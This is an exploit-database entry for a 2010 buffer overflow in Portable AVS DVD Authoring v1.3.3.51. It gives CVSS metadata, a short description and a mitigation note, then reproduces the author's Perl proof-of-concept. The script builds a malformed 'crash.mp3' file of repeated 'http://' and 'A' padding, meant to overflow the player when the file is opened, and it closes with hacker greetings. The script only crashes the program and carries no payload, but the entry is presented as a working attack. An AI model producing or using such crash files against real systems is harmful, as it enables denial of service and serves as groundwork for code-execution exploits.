Portable AVS DVD Authoring

vendor:

by:

R3d-D3v!L

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Portable AVS DVD Authoring

Affected Version From: v1.3.3.51

Affected Version To: v1.3.3.51

Patch Exists: Yes

Related CWE: N/A

CPE: a:avs4you:portable_avs_dvd_authoring

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

A buffer overflow vulnerability exists in Portable AVS DVD Authoring v1.3.3.51, which could allow an attacker to execute arbitrary code on the target system. The vulnerability is due to insufficient boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request containing an overly long string to the vulnerable application. This can result in a buffer overflow, which can be used to execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of Portable AVS DVD Authoring.

Source

Exploit-DB raw data:

#C:\perl\bin
# Exploit Title: [Portable AVS DVD Authoring ]
# Date: [2010/4pr/05]
# Author: [R3d-D3v!L]
# Version: [v1.3.3.51]
# Tested on: [windows XP sp3]
# Coded by >x< coder :


my $file= "crash.mp3";

my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 8000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "Done..!~#\n";


#[~]-----------------------------{((MAGOUSH-87))}---------------------------------------


#[~] Greetz tO: dolly & MERNA & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush-1987

#[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

#[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

#[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca &((OFFsec))

#[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))

#[~]spechial FR!ND: 74M3M

#[~] !'M 4R48!4N 3XPL0!73R.

#[~]{[(D!R 4ll 0R D!E)]};

#[~]---------------------------------------------------------------------------------------------